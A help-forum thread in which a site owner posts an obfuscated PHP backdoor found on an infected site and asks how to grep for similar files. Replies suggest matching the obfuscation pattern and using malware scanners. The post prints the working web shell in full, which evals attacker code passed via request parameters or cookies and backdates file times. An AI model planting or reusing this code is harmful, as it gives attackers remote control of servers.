Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
B
B
bismoney2016-03-02 12:50:59
SSH
bismoney, 2016-03-02 12:50:59

Search for such ssh virus how?

Hi friends!
The site got infected, opened the virus file.

$kgUsxEzsFdQ="".chr(98)."".""."".""."".chr(97).""."s"."".""."".""."".chr(101).""."6"."".""."".""."".chr(52)."".""."_".""."".""."d"."".""."e".""."".""."".chr(99)."".chr(111)."".""."d".""."".""."".chr(101);$dxkapiytRfmVUk=$kgUsxEzsFdQ(""."".""."".chr(88)."".chr(49).""."".""."".""."B"."".""."".chr(80).""."".""."U"."".chr(49)."".""."".chr(81)."".""."".chr(61));$GBWxBHKiwCJ=$$dxkapiytRfmVUk;$GdHitHucykx=false;if(isset($GBWxBHKiwCJ[$kgUsxEzsFdQ(""."".""."a"."".""."w".""."="."".""."".chr(61))])){$GdHitHucykx=$GBWxBHKiwCJ[$kgUsxEzsFdQ(""."".""."a"."".""."w".""."="."".""."".chr(61))];}$kZNyKDKKIPNwHpPD=""."h"."".""."".""."".chr(101).""."".chr(97).""."d".""."".""."".""."e"."".""."r";if(!$GdHitHucykx){$kZNyKDKKIPNwHpPD($kgUsxEzsFdQ(""."S"."".""."".""."".chr(70).""."".""."".chr(82).""."".""."".chr(85).""."U"."".""."".""."".chr(67)."".""."8"."".""."".""."".chr(120).""."".chr(76)."".""."".""."j".""."A"."".chr(103)."".""."".""."".chr(78)."".""."D"."".""."".""."A"."".""."".chr(48)."".""."I".""."".chr(69)."".""."".chr(53).""."".""."".chr(118)."".""."d".""."".""."C"."".""."".""."B"."".""."".""."".chr(71)."".chr(98).""."3"."".chr(86)."".""."".chr(117).""."".""."".""."Z".""."".""."A"."".""."".""."=".""."".""."="));exit($kgUsxEzsFdQ(""."".chr(78).""."D".""."".""."".""."A"."".""."z".""."".chr(73)."".""."".""."E".""."".chr(53).""."v".""."d"."".""."".""."".chr(67)."".""."".chr(66)."".""."".""."".chr(71)."".chr(98)."".chr(51)."".""."V".""."".""."".""."u".""."".""."Z"."".""."A".""."".""."".chr(61)."".""."".""."="));}eval($kgUsxEzsFdQ("QGlu".chr(97)."V9zZ".chr(88)."QoIm1lb".chr(87)."9yeV9saW1pdCIsICIx".chr(77)."DI0TSIpO".chr(119)."pA".chr(99)."".chr(50)."V0X".chr(51)."R".chr(112)."bWVf".chr(98)."Gl".chr(116)."aX".chr(81)."oM".chr(67)."k7CkBpZ25vcm".chr(86)."fdXNlcl9hYm9ydCh0cnVl".chr(75)."TsgC".chr(107)."BlcnJvcl9yZX".chr(66)."vcnRpbmco".chr(77)."".chr(67)."k".chr(55)."CmZ1bmN0aW9u".chr(73)."".chr(71)."NvbGxl".chr(89)."3QoKXsKCSRj".chr(98)."3VudCA9I".chr(68)."A7".chr(67)."".chr(103)."lpZihp".chr(99)."3Nld".chr(67)."gkX0dFVFsnYyddKSAmJ".chr(105)."BzdHJsZW4".chr(111)."JF9HRVRbJ2Mn".chr(88)."Sk+MCl7C".chr(103)."k".chr(74)."".chr(74)."G".chr(78)."vdW50ID0gJF".chr(57)."H".chr(82)."VR".chr(98)."J2MnXTsKCX1lbHNlI".chr(71)."".chr(108)."mKGlzc2V0K".chr(67)."RfU".chr(69)."9TVFsnYyddKSAmJ".chr(105)."Bzd".chr(72)."JsZW4oJF9QT".chr(49)."NUWydjJ10pP".chr(106)."A".chr(112)."ewoJCSRjb3VudCA9ICRfUE9TVFsnYyddOwoJfQoJ".chr(74)."F9jI".chr(68)."0gYXJ".chr(121)."YXkoK".chr(84)."sKCSRiNiA9ICJiYXNlNj".chr(81)."iLiIiLiJfIi4iZGVjI".chr(105)."4ib2RlIjsK".chr(67)."".chr(87)."Z".chr(118)."cigkaSA9I".chr(68)."E7ICRpIDw9I".chr(67)."Rjb3VudDsgJGkrKy".chr(65)."p".chr(101)."woJCWl".chr(109)."".chr(75)."Gl".chr(122)."c2V0KCRfU0VSVk".chr(86)."SW".chr(121)."".chr(74)."IVFR".chr(81)."X0NPT0tJRSIuJG".chr(108)."dKSA".chr(109)."JiBzdHJsZW4oJF9TRVJWRVJbIkhUVFBfQ0".chr(57)."PS0lFIi4kaV0pPjApewoJCQkkX2NbXT".chr(48)."g".chr(100)."HJpbSgkX".chr(49)."NFUlZFU".chr(108)."siSFRUUF9DT09LSUUiLi".chr(82)."pXSk".chr(55)."CgkJf".chr(81)."o".chr(74)."fQoJcm".chr(86)."0".chr(100)."XJuICRiNihpbXBsb2RlKCIiLCRf".chr(89)."yk".chr(112)."Owp".chr(57)."CkB".chr(48)."b3VjaCg".chr(107)."X".chr(49)."NFUlZFUlsiU0".chr(78)."SSVBUX0Z".chr(74)."TE".chr(86)."OQU1FI".chr(108)."0sKHRpbWUoKS0oMzY".chr(119)."MC".chr(111)."".chr(121)."NCozNjUqMykpKTsKQHRv".chr(100)."WNoK".chr(71)."Jh".chr(99)."2VuYW1lKCRfU".chr(48)."VSVk".chr(86)."SWyJ".chr(84)."Q1JJUFRfRkl".chr(77)."RU5BTUUi".chr(88)."S".chr(107)."".chr(115)."K".chr(72)."RpbWUoKS0oMzY".chr(119)."MCoyNCozNjUqMykpKTsKLy8kbGluZXMgPSBjb3VudChma".chr(87)."xlKCRfU0VSV".chr(107)."VSWyJTQ1JJUFRfRkl".chr(77)."RU5BTUUiXS".chr(107)."pOwovL2lmKCRsaW5lcyA9PSAyKXsKCSRfYyA9IGNvb".chr(71)."xlY3QoKTsKICBpZighZ".chr(87)."1wdHko".chr(74)."F9jKSAmJiB".chr(122)."dHJsZW4oJF9".chr(106)."".chr(75)."T4wKXsK".chr(73)."CAgICAgZXZhbCgkX2MpOwogIH1lbHNl".chr(101)."wog".chr(73)."CAgICBoZWFkZ".chr(88)."IoIkhUVFAvMS4wIDQwNC".chr(66)."Ob3QgRm91bmQiKTsKICB9Ci8vfW".chr(86)."".chr(115)."".chr(99)."2V7Ci8vC".chr(87)."hlY".chr(87)."Rlcigi".chr(83)."FRUUC8xLjAgN".chr(84)."A1IE5v".chr(100)."C".chr(66)."Gb3VuZCIpOwovL30="));exit();

The virus is coded. All values ​​in other files are different.
Can you tell me the expression for grep to find all such files via ssh please.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
A
Alexander, 2016-03-02
@bismoney

look for .""."".
In normal files, this should not be. A meaningless construction from a programmer's point of view is just the result of code obfuscation.

Report
E
Evgeniy, 2016-03-02
@eZhrv

I would play it safe and
run ai-bolit (php)
www.securitylab.ru/blog/company/revisium/aibolit-e...
https://revisium.com/ai/

Report
A
Alexander, 2016-03-02
@SashaSkot

To beat the virus - www.comodorus.ru/free_versions/detal/comodo_free/14
or ClamAV - both know about this.
put
To find and get rid of its implementation - the easiest and fairly quick way is to transfer the Windows computer site with Kaspersky.
+
https://habrahabr.ru/post/188878/

Similar questions
N
Nicholas Secret2018-07-29 22:19:15
Kerberos ssh authentication not happening through AD? 2Reply
G
Georgy Butin2020-07-18 18:52:27
Changing db user permissions via ssh? 2Reply
S
SaturnOFF2020-07-19 09:59:19
How to pass value to JSON SSH variable? 0Reply
I
IliaBrz2018-08-01 21:09:56
How to enable SSH on Raspberry Pi without HDMI? 3Reply
H
hckn2018-08-02 13:13:35
Sshguard replaces fail2ban? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question